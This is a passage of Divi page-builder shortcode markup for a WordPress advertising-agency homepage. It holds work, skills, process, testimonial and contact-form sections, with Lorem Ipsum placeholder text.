custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" title_text=\"home-office-02\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" title_text=\"home-office-03\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" title_text=\"home-office-05\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04.jpg\" title_text=\"home-office-04\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" 